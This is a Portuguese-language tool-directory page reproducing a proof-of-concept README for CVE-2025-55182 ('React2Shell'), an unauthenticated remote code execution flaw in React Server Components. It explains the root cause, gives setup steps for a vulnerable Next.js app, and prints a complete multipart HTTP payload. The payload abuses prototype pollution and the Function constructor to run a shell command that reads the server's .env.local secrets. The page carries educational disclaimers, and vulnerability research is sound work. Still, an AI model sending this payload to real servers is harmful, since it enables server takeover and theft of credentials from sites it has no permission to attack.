Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
poc-cve-2025-55182 — Este repositório contém um POC do CVE-2025-55182, uma vulnerabilidade crítica (pontuação CVSS 10.0) de execução remota de código pré-autenticação que afeta o React Server Components, também conhecida como React2Shell. | Kitploit
Ferramentas/GitHubGitHub/koadt/poc-cve-2025-55182
Análise Dinâmica (Sandboxing)Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebCTFTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de PayloadsLabs e Prática
GitHubkoadt/poc-cve-2025-55182
1536há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

poc-cve-2025-55182

Este repositório contém um POC do CVE-2025-55182, uma vulnerabilidade crítica (pontuação CVSS 10.0) de execução remota de código pré-autenticação que afeta o React Server Components, também conhecida como React2Shell.

Ver RepositórioSite
Compartilhar

CVE-2025-55182 (React2Shell) - Prova de Conceito

⚠️ AVISO: Este repositório é apenas para fins educacionais e de pesquisa em segurança. Não use este exploit em sistemas que você não possui ou sem permissão explícita para testar.

Visão Geral

Este repositório contém uma demonstração de prova de conceito de CVE-2025-55182, uma vulnerabilidade crítica de execução remota de código sem autenticação que afeta os React Server Components.

Pontuação CVSS: 10.0 (Crítica)

Versões Afetadas:

  • React Server Components 19.0.0, 19.1.0, 19.1.1 e 19.2.0
  • Pacotes: react-server-dom-parcel, react-server-dom-turbopack, react-server-dom-webpack

Resumo da Vulnerabilidade

CVE-2025-55182 é uma vulnerabilidade de desserialização insegura na implementação do protocolo Flight dos React Server Components. A vulnerabilidade permite que atacantes não autenticados executem código JavaScript arbitrário no servidor, criando payloads maliciosos que exploram a travessia da cadeia de protótipos e padrões inseguros de acesso a propriedades.

Causa Raiz

A vulnerabilidade decorre de como os React Server Components desserializam os payloads do protocolo Flight. Ao processar referências de módulo, o código usa notação de colchetes para acessar propriedades (moduleExports[metadata[2]]), que percorre toda a cadeia de protótipos do JavaScript. Isso permite que atacantes referenciem propriedades que não foram explicitamente exportadas, incluindo a propriedade constructor, que fornece acesso ao construtor global Function.

Ao encadear técnicas de poluição de protótipo com os mecanismos internos de processamento de chunks do React, um atacante pode construir um payload que, em última análise, executa código arbitrário através do construtor Function.

Pré-requisitos

  • Burp Suite Community ou Professional (ou qualquer proxy/cliente HTTP)
  • Uma versão vulnerável do React.js ou Next.js

Instruções de Configuração

Passo 1: Criar um Projeto Vulnerável

Crie um novo projeto usando uma versão que inclua os React Server Components vulneráveis:

root@kitploit:~
npx [email protected] poc-react2shell
cd poc-react2shell

Ou use este repositório.

Passo 2: Criar um Arquivo de Ambiente de Teste

Crie um arquivo .env.local na raiz do projeto para demonstrar o impacto da vulnerabilidade:

root@kitploit:~
SECRET_API_KEY=XXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Passo 3: Iniciar o Servidor de Desenvolvimento

Inicie o servidor de desenvolvimento do Next.js:

root@kitploit:~
npm run dev

O servidor deve iniciar em http://localhost:3000.

Passos de Exploração

Passo 4: Enviar o Payload Malicioso

  1. No Burp Suite, vá para a guia Repeater
  2. Defina a URL de destino para http://localhost:3000/
  3. Copie e cole o payload inteiro na janela de requisição
  4. Envie
Clique para expandir
root@kitploit:~
POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 752

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('cat .env.local',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

Passo 5: Analisar a Resposta

A resposta deve conter o conteúdo do seu arquivo .env.local no corpo da resposta:

Response

Payload

O payload consiste em três campos de formulário multipart:

Campo 0: Um objeto chunk falso contendo:

  • Referências de poluição de protótipo ($1:__proto__:then)
  • Uma referência Blob ($B1337) que aciona o exploit
  • Um objeto _response poluído com _prefix e _formData.get maliciosos

Campo 1: Uma referência ao campo 0 ($@0)

Campo 2: Um array vazio ([])

O código malicioso em _prefix lê .env.local usando child_process.execSync do Node.js e insere o resultado em um digest de erro.

Impacto

Esta vulnerabilidade permite que atacantes:

  • Executar código arbitrário no servidor
  • Ler arquivos sensíveis (variáveis de ambiente, arquivos de configuração, etc.)
  • Estabelecer shells reversos
  • Exfiltrar dados
  • Realizar qualquer operação que o processo Node.js tenha permissão para executar

Referências

  • Detalhes do CVE-2025-55182
  • Next.js-RSC-RCE-Scanner-CVE-2025-66478
  • Comunicado de Segurança do React
  • Comunicado de Segurança do Facebook
  • Catálogo de Vulnerabilidades Exploradas Conhecidas da CISA
  • react2shellcve202555182

Pratique este CVE em um cenário real

Quer explorar o CVE-2025-55182 em um ambiente CTF prático? Confira OSS OopsSec Store, um laboratório deliberadamente vulnerável projetado para treinamento de segurança ofensiva. Este CVE está implementado como uma das flags!


Aviso Legal

Esta prova de conceito é fornecida apenas para fins educacionais e de pesquisa em segurança. Sempre certifique-se de ter permissão explícita por escrito antes de testar vulnerabilidades de segurança em qualquer sistema.

Baixar ferramenta